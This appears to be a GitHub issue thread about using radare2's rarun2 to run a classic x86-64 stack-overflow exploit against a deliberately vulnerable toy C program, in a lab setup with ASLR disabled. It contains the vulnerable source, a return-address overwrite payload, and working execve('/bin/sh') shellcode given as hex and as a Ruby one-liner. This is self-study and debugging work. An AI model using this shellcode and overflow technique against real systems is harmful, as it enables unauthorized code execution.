rarun2: Read a shellcode into an environment variable

[pgalkin]

Help me out please, I feel this must be possible. My goal: use radare2 as a harness for exploiting a classing stack overflow. ASLR disabled, stack is executable, platform is Linux x86-64. I followed this tutorial: https://www.ired.team/offensive-security/code-injection-process-injection/binary-exploitation/64-bit-stack-based-buffer-overflow

This is the target:

#include <stdio.h>
#include <unistd.h>

int vuln() {
    char buf[80];
    int r;
    r = read(0, buf, 400);
    printf("\nRead %d bytes. buf is %s\n", r, buf);
    puts("No shell for you :(");
    return 0;
}

int main(int argc, char *argv[]) {
    printf("Try to exec /bin/sh");
    vuln();
    return 0;
}

The suggested approach is to store the shellcode in an environment variable, and then overflowing with a padded string with the address of the shellcode at the end. This address is meant to overwrite the return address. This is how it looks:

> xxd in2.bin
00000000: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000010: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000020: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000030: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000040: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000050: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000060: 4141 4141 4141 4141 4ded ffff ff7f 0000  AAAAAAAAM.......

The address is 0x7fffffffed4d. This is where the tutorial wasn't precise enough. On my machine this address gets into RIP in a rounded up form because of alignment requirement (or so I think). More specifically I get 0x7fffffffed54. This means I land a bit further than the start of my shellcode.

Fine then, I have to pad with nops. How many? Well, 0x7fffffffed54 - 0x7fffffffed4d = 7, at least this many. However, it is not possible to pad an environment variable with nops via shell, they will be stripped out. I don't understand why it happens but it does. Fine then, I'll pad with whatever but will be precise and have exactly 7 of whatever. This is my padded shellcode:

> xxd aligned
00000000: 4848 4848 4848 4848 31d2 48bb ff2f 6269  HHHHHHHH1.H../bi
00000010: 6e2f 7368 48c1 eb08 5348 89e7 4831 c050  n/shH...SH..H1.P
00000020: 5748 89e6 b03b 0f05 6a01 5f6a 3c58 0f05  WH...;..j._j<X..
00000030: 0a5c 6e0a

This is how I set the environment variable to the shellcode above (in fish shell):

set PWN (ruby -e 'print("\\x48\\x48\\x48\\x48\\x48\\x48\\x48\\x48\\x31\\xd2\\x48\\xbb\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x48\\xc1\\xeb\\x08\\x53\\x48\\x89\\xe7\\x48\\x31\\xc0\\x50\\x57\\x48\\x89\\xe6\\xb0\\x3b\\x0f\\x05\\x6a\\x01\\x5f\\x6a\\x3c\\x58\\x0f\\x05\\x0a\\x5c\\x6e\\x0a")')

So my manual launch works and spawns the shell:

> cat in2.bin - | ./vulnerable


Try to exec /bin/sh
Read 114 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAr
No shell for you :(
whoami

antharas
id

uid=1000(antharas) gid=1000(antharas) groups=10(wheel),18(audio),23(input),27(video),104(docker),300(abuild),1000(antharas),1001(seat)

Now I want to do the same but with rarun2 (or any other radare2 tools). Conceptually this should work:

> rarun2 program=vulnerable envfile=envfile stdin=in2.bin

Where envfile is this (PWN=<shellcode>):

ruby -e 'print("PWN=\\x48\\x48\\x48\\x48\\x48\\x48\\x48\\x48\\x31\\xd2\\x48\\xbb\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x48\\xc1\\xeb\\x08\\x53\\x48\\x89\\xe7\\x48\\x31\\xc0\\x50\\x57\\x48\\x89\\xe6\\xb0\\x3b\\x0f\\x05\\x6a\\x01\\x5f\\x6a\\x3c\\x58\\x0f\\x05\\x0a\\x5c\\x6e\\x0a")' > envfile

It doesn't:

> rarun2 program=vulnerable envfile=envfile stdin=in2.bin
Try to exec /bin/sh
Read 112 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAp
No shell for you :(
fish: Job 1, 'rarun2 program=vulnerable envfi…' terminated by signal SIGSEGV (Address boundary error)

The 2 null bytes of the address weren't read, I notice. Ok, how about this:

> rarun2 program=vulnerable setenv=PWN=@aligned stdin=in2.bin
Try to exec /bin/sh
Read 112 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAp
No shell for you :(
fish: Job 1, 'rarun2 program=vulnerable seten…' terminated by signal SIGSEGV (Address boundary error)

Same error. How do I fix the issue with 2 null bytes not being read, and do I set the environment variable correctly using setenv or envfile options?

Are there any C harnesses that I can use instead of radare2 for this kind of exploit? I feel like this is very basic, yet there is very little solid info on the internet, most of it just casts the shellcode as a function and calls it. AI suggests I base64 encode the payload. Amusing, yes. I just want to spawn a shell on a stack overflow, that's it. Not manually, manually I can do it, it's a pain. Automatically. I launch the thing and it spawns, like a real hacker from the 90s.

[pgalkin]

Just in case anybody is curious enough to replicate: https://github.com/pgalkin/classic_shellcode_sample. Ignore harness.c, it's a scratch file. aligned is binary padded shellcode that I read into env var. It's source is sc.s (without padding). in2.bin is the payload that redirects to the shellcode.

[trufae]

Uhm. Environment variables are null terminated strings. Not sure how can you do that

[trufae]

wait. i have a fun idea xD

[trufae]

this was the fun idea: #24275

can you test the pr and confirm the correct behaviour? :)

[pgalkin]

Thanks for taking the time to reply!

Ok, so I've been testing on 356ad98.
These environment variables are cursed, they change their address depending on how you set them. Initially on the stack, then migrate on the heap after setenv. Behavior of extern char **environ and env as 3rd arg to main is different.

Source: https://www.netmeister.org/blog/stdarg.html

I'm not sure if this behavior is the cause of my problems. My debugging also messes up the offset I need to have for my address payload. I wanted to print them, so I added:

> cat vulnerable.c
#include <stdio.h>
#include <unistd.h>

extern char **environ;

int vuln() {
    char buf[80];
    int r;
    r = read(0, buf, 400);
    printf("\nRead %d bytes. buf is %s\n", r, buf);
    puts("No shell for you :(");
    return 0;
}

int main(int argc, char *argv[]) {
    while (environ) {
        puts(*environ);
        environ++;
    }
    printf("Try to exec /bin/sh");
    vuln();
    return 0;
}

For today I've exhausted my patience for byte tinkering, so maybe next time. Just have to pay attention and be careful.

So far I couldn't get it work. 2 main problems:

1. Still can't put nops in environment variables.
2. Still can't put null-bytes in stdin.

The 1st issue can be seen here

rarun2 stdin=in3.bin program=vulnerable setenv=PWN=@aligned`
...
PWN=H1�/bin/shH�SH�1PWH�j_j<X
fish: Job 1, 'rarun2 stdin=in3.bin program=vu…' terminated by signal SIGSEGV (Address boundary error)


antharas@lair ~/c/b/c/2/shellcode_example (main) [SIGSEGV]> xxd aligned
00000000: 9090 9090 9090 9048 31d2 48bb ff2f 6269  .......H1.H../bi
00000010: 6e2f 7368 48c1 eb08 5348 89e7 4831 c050  n/shH...SH..H1.P
00000020: 5748 89e6 b03b 0f05 6a01 5f6a 3c58 0f05  WH...;..j._j<X..

These 9090 9090 9090 90 are not in the PWN. This means I have to either be precise or use something else that is equivalent to a nop.

For the 2nd issue, the address I try to load is (little endian): 42ec ffff ff7f 0000. This succeeds if I do it via cat in3.bin - | ./target.
Fails if I do it via rarun2 program=target stdin=in3.bin ...

As for your request, I couldn't test it so far because my current shellcode (called aligned above) doesn't have any null bytes. I'll need a to look for a different example.

[trufae]

you must encode the shellcode to avoid null bytes, i pushed a nullby encoder but ragg already ships a xor encoder that may help you on that